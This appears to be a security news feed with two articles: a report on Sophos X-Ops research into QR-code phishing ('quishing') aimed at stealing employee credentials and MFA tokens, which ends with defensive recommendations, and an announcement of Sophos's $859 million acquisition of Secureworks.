We work hand-in-hand with local partners and organizations to develop and implement strategies tailored to Saudi Arabia’s specific needs. Our regional presence ensures that businesses and government institutions receive the expertise and support required to stay ahead of emerging threats.

From QR Code to Compromise: The Growing Threat of “Quishing” https://securityreviewmag.com/?p=27407 Tue, 19 Nov 2024 15:01:37 +0000 https://securityreviewmag.com/?p=27407 Sophos has released the results of Sophos X-Ops research on a new type of threat: quishing. This new attack vector involves the use of fraudulent QR codes, emailed by threat actors, to bypass the phishing security measures put in place by companies. This fraudulent QR code, embedded in a PDF document attached to an email, takes the form of a message about payroll, employee benefits, or other forms of official paperwork a business might send to an employee.

Because the QR code cannot be opened directly from the computer, the employee must scan it with their mobile phone. The QR code links to a phishing page, which the employee may not recognize as malicious, since phones are usually less protected than computers. The attackers' goal is to capture employees' passwords and multi-factor authentication (MFA) tokens, and then use them to access the company's systems while bypassing the security measures in place.

“We spent a considerable amount of time sifting through all the spam samples we had to find examples of quishing,” comments Andrew Brandt, principal researcher at Sophos X-Ops. “Our research has revealed that attacks that exploit this specific threat vector are intensifying, both in terms of volume and sophistication, especially when it comes to the appearance of the PDF document.”

Beyond the social engineering tactics and the quality of the emails, attachments and QR code graphics, these attacks also appear to be growing in terms of organization. Some malicious actors now offer as-a-service tools for running phishing campaigns with fraudulent QR codes. Alongside features such as CAPTCHA bypasses and the generation of proxy IP addresses to evade automated threat detection, these criminal organizations provide a sophisticated phishing platform capable of capturing the credentials and MFA tokens of targeted individuals.

To encourage organizations to better protect systems against this type of attack, Sophos X-Ops shares a list of recommendations:

  1. Be vigilant about internal emails about HR topics, salaries or company benefits: Sophos X-Ops’ research has found that social engineering tricks exploit these themes to trick employees into scanning fraudulent QR codes from their mobile devices.
  2. Monitor risky sign-ins: Using identity management tools, organizations can detect unusual sign-in activity.
  3. Enable Conditional Access: This feature helps enforce access controls based on the user’s location, device status and risk.
  4. Enable detailed access logging and monitoring: advanced monitoring of sign-in and access logs gives better visibility into all access to the system and helps detect this type of threat in time.
  5. Implement advanced email filtering: some QR code phishing protection solutions detect fraudulent QR codes embedded directly in emails, with plans to extend detection to QR codes carried in attachments.
  6. Encourage employees to be vigilant and report incidents: Prompt reporting of anomalies to the incident response team is essential to protect company systems from phishing.
  7. Revoke suspicious user sessions: It is imperative to have a plan in place to revoke user access that shows signs of compromise.
Sophos to Acquire Secureworks https://securityreviewmag.com/?p=27272 Tue, 22 Oct 2024 07:25:22 +0000 https://securityreviewmag.com/?p=27272 Sophos and Secureworks have announced a definitive agreement for Sophos to acquire Secureworks. The all-cash transaction is valued at approximately $859 million. Sophos is backed by Thoma Bravo, a leading software investment firm.

Sophos’ experience and reputation as a leading provider of managed security services and end-to-end security products, combined with Secureworks’ security operations expertise transformed into the Taegis™ platform, is expected to further deliver complementary advanced MDR and XDR solutions for the benefit of their global customer bases. Together, they will help strengthen the resilience and security posture of global organizations of any size with a combination of security controls, AI, world-class threat intelligence, and two teams with decades of cybersecurity expertise.

Sophos expects to integrate solutions from both companies into a broader and stronger security portfolio benefiting small, mid, and enterprise customers. This includes Sophos expanding its current portfolio with other new offerings like identity detection and response (ITDR), next-gen SIEM capabilities, operational technology (OT) security, and enhanced vulnerability risk prioritization. As two partner-centric organizations, the combination of Sophos and Secureworks will enable the combined company to expand its market presence to create greater value within the channel and strengthen the overall security community.

“Secureworks offers an innovative, market-leading solution with their Taegis XDR platform. Combined with our security solutions and industry leadership in MDR, we will strengthen our collective position in the market and provide better outcomes for organizations of all sizes globally,” said Joe Levy, CEO of Sophos. “Secureworks’ renowned expertise in cybersecurity perfectly aligns with our mission to protect businesses from cybercrime by delivering powerful and intuitive products and services. This acquisition represents a significant step forward in our commitment to building a safer digital future for all.”

Cyber risk continues to escalate, driven by a rampant cybercriminal ecosystem and global geopolitical pressures. Combined, Sophos and Secureworks share a long history of having exceptional threat intelligence, security operations, incident response, and innovative security product capabilities that help organizations defeat these adversaries.

“Our mission at Secureworks has always been to secure human progress. Sophos’ portfolio of leading endpoint, cloud, and network security solutions – in combination with our XDR-powered managed detection and response – is exactly what organizations are looking for to strengthen their security posture and collectively turn the tide against the adversary,” said Wendy Thomas, CEO, Secureworks. “As Joe and I both believe, this transaction will strengthen our go-to-market offering with Sophos’ global scale, expertise and reputation.”

Under the terms of the agreement, Sophos intends to acquire Secureworks in an all-cash transaction valued at $859 million. Secureworks shareholders, including Dell Technologies, will receive $8.50 per share in cash. This represents a 28% premium to the unaffected 90-day volume-weighted average price (VWAP). The transaction is expected to close in early 2025, subject to customary closing conditions. Additional information regarding this announcement can be found in the Form 8-K filed by Secureworks with the United States Securities and Exchange Commission (SEC) on Oct. 21, 2024.

Kirkland & Ellis LLP is acting as legal counsel to Sophos, and Goldman Sachs & Co. LLC, Barclays, BofA Securities, HSBC Securities (USA) Inc. and UBS Investment Bank are acting as financial advisors and providing debt financing for the transaction. Piper Sandler & Company and Morgan Stanley & Co. LLC are acting as financial advisors to Secureworks, and Paul, Weiss, Rifkind, Wharton & Garrison LLP is acting as legal counsel.
